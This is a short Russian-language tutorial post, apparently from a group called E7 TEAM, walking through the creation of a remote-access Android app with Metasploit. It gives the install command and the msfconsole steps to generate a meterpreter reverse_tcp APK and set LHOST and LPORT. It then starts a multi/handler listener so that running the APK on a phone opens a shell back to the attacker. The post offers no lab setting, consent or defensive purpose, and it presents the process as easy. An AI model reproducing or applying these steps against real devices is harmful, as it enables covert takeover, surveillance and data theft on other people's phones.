Удаленный доступ к Android. Metasploit

E7 | TEAM

Приветствую! В этой статье мы узнаем как создать программу удаленного доступа для телефона с ОС Android с помощью утилиты MetaSploit!

Установка:

Для начала произведем установку MetaSploit на нашу систему:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

Теперь после установки запускаем программу с помощью msfconsole

Создание приложения:

Для того чтобы сгенерировать reverse shell введем следующую команду чтобы дать понять какой модуль мы будем использовать:

use payload/android/meterpreter/reverse_tcp

Теперь зададим необходимые настройки для генерации, посмотреть их можно с помощью команды set options.

Теперь нам остаётся ввести:

set LHOST <IP>

set LPORT <PORT>

generate -t raw -f rev.apk

Далее нам нужно запустить прослушку на этом порту:

use exploit/multi/handler

И после этого мы запускаем run, а на Андроиде запускаем сгенерированный APK файл и получаем:

Как мы видим создать эксплоит для андроид устройства очень легко и быстро!